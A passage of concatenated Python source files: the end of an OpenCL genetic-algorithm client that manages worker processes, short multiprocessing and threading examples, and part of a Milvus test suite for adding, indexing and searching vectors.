else:
self.error('unknown command {}'.format(cmd))
except:
traceback.print_exc()
## Send data back to server
# @param data The msg to be sent.
def __send(self, data):
if self.client:
self.client.send(repr(data))
## Called when the process is terminated or receives 'exit' command from
# server.
# Need to notify UI that the worker is lost and then socket client
# will be closed here.
def __shutdown(self):
self.info('Worker [{0}] is exiting ...'.format(self.device.name))
try:
if self.ocl_ga:
self.ocl_ga.stop()
self.ocl_ga = None
self.__notify_client_offline()
except:
print('[OpenCLGAClient] Exception while notifying server ...')
try:
# NOTE : Make sure all message is sent from clients, so that UI could
# recieve the notification for client's offline.
while not self.client.is_message_sent():
time.sleep(0.1)
except:
pass
if self.client:
try:
self.client.shutdown()
except:
print('[OpenCLGAClient] Exception while shutting down client socket ...')
self.client = None
self.running.value = 0
## Notify UI that client is connected.
def __notify_client_online(self, client_ip):
self.__send({'type' : 'workerConnected',
'data' : { 'type' : cl.device_type.to_string(self.dev_type),
'platform' : self.platform.name,
'name' : self.device.name,
'ip' : client_ip,
'worker' : self.uuid}})
## Notify UI that client is lost.
def __notify_client_offline(self):
self.__send({'type' : 'workerLost',
'data' : { 'worker' : self.uuid}})
## OpenCLGAClient is supposed to create as many worker processes as possible.
# The number of workers should be the number of platforms on the machine
# times the number of devices which is provided by each platform.
# e.g. There're 2 devices for platform 1, 1 device for platform 2.
# Finally, 3 worker processes will be created.
# Since the computing power may vary among all devices, OpenCLGAClient will be
# down until all workers are not alive.
class OpenCLGAClient(Logger):
def __init__(self, ip, port):
Logger.__init__(self)
self.server_ip = ip
self.server_port = port
self.__workerProcesses = []
self.__create_workers_for_devices()
## Start all worker processes, and setup a while-loop to monitor the status
# of each worker.
# Loop will be broken when all workers are all dead (either 1. have done
# their jobs or 2. are shut down by OpenCLGAServer 'exit' command) or
# a KeyboardInterrupt happens.
def run_forever(self):
try:
self.__start_workers()
while True:
if not self.__is_alive():
self.info('[OpenCLGAClient] All workers are NOT alive, ByeBye !!')
break
time.sleep(0.01)
except KeyboardInterrupt:
self.info('[OpenCLGAClient] KeyboardInterrupt, ByeBye !!')
## Stop all workers, and clean up variables.
def shutdown(self):
self.__stop_workers()
self.__workerProcesses = []
## This is a workaround for Mac Intel Drivers. We will get an error:
# pyopencl.cffi_cl.LogicError: clGetContextInfo failed: INVALID_CONTEXT
# if we try to use get_devices() in this process. So, we create an extra
# process to read all platforms and devices. After that, we can create
# device and command queue without this error.
def __create_workers_for_devices(self):
p_p, c_p = Pipe()
p = Process(target=query_devices, args=(c_p,))
p.start()
device_list = p_p.recv()
p.join()
for dev in device_list:
self.__create_process(dev[0], dev[1])
## Create OpenCLGAWorker process according by platform and device.
# @param platform_index The index of platform
# @param device_index The index of device for certain platform.
def __create_process(self, platform_index, device_index):
process = OpenCLGAWorker(platform_index,
device_index,
self.server_ip,
self.server_port)
self.__workerProcesses.append(process)
## Start all worker processes
def __start_workers(self):
for worker in self.__workerProcesses:
worker.start()
## Terminate all worker processes
def __stop_workers(self):
for worker in self.__workerProcesses:
self.verbose('stop_workers ... {} is alive {}'.format(worker, worker.is_alive()))
if worker.is_alive():
worker.terminate()
self.info('process {} is terminated.'.format(worker))
## OpenCLGAClient is only alive when all workers are alive.
def __is_alive(self):
alive = True
for worker in self.__workerProcesses:
alive = alive and worker.is_alive()
return alive
## Start up a standalone OpenCLGAClient. It will be closed when all worker
# process are dead. Also will be closed when receving KeyboardInterrupt (Ctrl+c).
# @param server The IP of OpenCLGAServer.
# @param port The port which is listened by OpenCLGAServer
def start_ocl_ga_client(server, port):
global oclClient
assert oclClient == None
logger = Logger()
oclClient = OpenCLGAClient(server, port)
try:
oclClient.run_forever()
finally:
oclClient.shutdown()
oclClient = None
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenCLGA client help')
parser.add_argument('server', metavar='ip', type=str,
help='the server ip, default : 127.0.0.1', default='127.0.0.1')
parser.add_argument('port', metavar='port', type=int,
help='the server port, default : 12345', default=12345)
args = parser.parse_args()
start_ocl_ga_client(args.server, args.port)
|
context_and_start_methods_01_spawn_01.py
|
import multiprocessing as mp
import os
def processes_info() -> None:
print(f'\nprocess id \t\t-> {os.getpid()}')
print(f'\nparent process id \t-> {os.getppid()}')
def target_function() -> None:
processes_info()
if __name__ == '__main__':
# should not be used more than once in the program.
mp.set_start_method(method='spawn') # new clean process
process = mp.Process(name='spawn process', target=target_function)
process.start()
process.join()
print(f'\n{process.name} joined')
|
script_run_bg.py
|
# Snippet
import threading
# Run a script function in a separate thread
def run_bg(target_func, args):
t = threading.Thread(target=target_func, args=args)
t.start()
# End snippet
|
test_add_vectors.py
|
import time
import threading
import logging
import threading
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_add"
ADD_TIMEOUT = 60
tag = "1970-01-01"
add_interval_time = 1.5
nb = 6000
class TestAddBase:
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert assert_has_collection(connect, collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 collection after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 collection after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, collection, get_simple_index):
'''
target: test build index add after vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, collection, get_simple_index):
'''
target: test build index add after vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2 a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
connect.flush([collection])
assert status.OK()
assert len(ids) == nq
status, result = connect.search_vectors(collection, top_k, query_records=vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for _ in range(nq)]
with pytest.raises(Exception):
connect.add_vectors(collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition and add vectors in it
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition, add vectors with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
new_tag = "new_tag"
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=new_tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it repeatly, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
for i in range(5):
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.level(2)
def test_add_vectors_without_connect(self, dis_connect, collection):
'''
target: test add vectors without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
with pytest.raises(Exception) as e:
status, ids = dis_connect.add_vectors(collection, vectors)
def test_add_collection_not_existed(self, connect):
'''
target: test add vectors in collection, which not existed before
method: add vectors collection not existed, check the status
expected: status not ok
'''
nq = 5
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(gen_unique_str("not_exist_collection"), vector)
assert not status.OK()
assert not ids
def test_add_vector_dim_not_matched(self, connect, collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
# TODO: enable
# @pytest.mark.repeat(10)
@pytest.mark.timeout(ADD_TIMEOUT)
def _test_add_vector_with_multiprocessing(self, args):
'''
target: test add vectors, with multi processes
method: 10 processed add vectors concurrently
expected: status ok and result length is equal to the length off added vectors
'''
collection = gen_unique_str()
uri = "tcp://%s:%s" % (args["ip"], args["port"])
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
milvus.create_collection(param)
vector = gen_single_vector(dim)
process_num = 4
loop_num = 5
processes = []
def add():
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
i = 0
while i < loop_num:
status, ids = milvus.add_vectors(collection, vector)
i = i + 1
milvus.disconnect()
for i in range(process_num):
p = Process(target=add, args=())
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
time.sleep(2)
status, count = milvus.count_collection(collection)
assert count == process_num * loop_num
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_add_rows_count_multi_threading(self, args):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and add vectors in it(idmap),
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
collection = gen_unique_str()
uri = "tcp://%s:%s" % (args["ip"], args["port"])
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
milvus.create_collection(param)
vectors = gen_vectors(nb, dim)
def add(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus = get_milvus(args["handler"])
milvus.connect(uri=uri)
status, result = milvus.add_vectors(collection, records=vectors)
assert status.OK()
status = milvus.flush([collection])
assert status.OK()
for i in range(thread_num):
x = threading.Thread(target=add, args=(i, ))
threads.append(x)
x.start()
for th in threads:
th.join()
status, res = milvus.count_collection(collection)
assert res == thread_num * nb
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of L2
method: create 50 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
for j in range(5):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddIP:
"""
******************************************************************
The following cases are used to test `add_vectors / index / search / delete` mixed function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, ip_collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
param = {'collection_name': ip_collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, ip_collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert assert_has_collection(connect, ip_collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, ip_collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(ip_collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 collection after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': 'test_add_vector_delete_another_collection',
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, ip_collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(ip_collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, ip_collection):
'''
target: test delete collection_1 collection after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, ip_collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(ip_collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index add after vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test build index add after vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
if index_type == IndexType.IVF_PQ:
pytest.skip("Skip some PQ cases")
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, ip_collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
connect.flush([ip_collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, ip_collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, ip_collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(ip_collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, ip_collection):
'''
target: test search vector after add vector
method: add vector and search collection
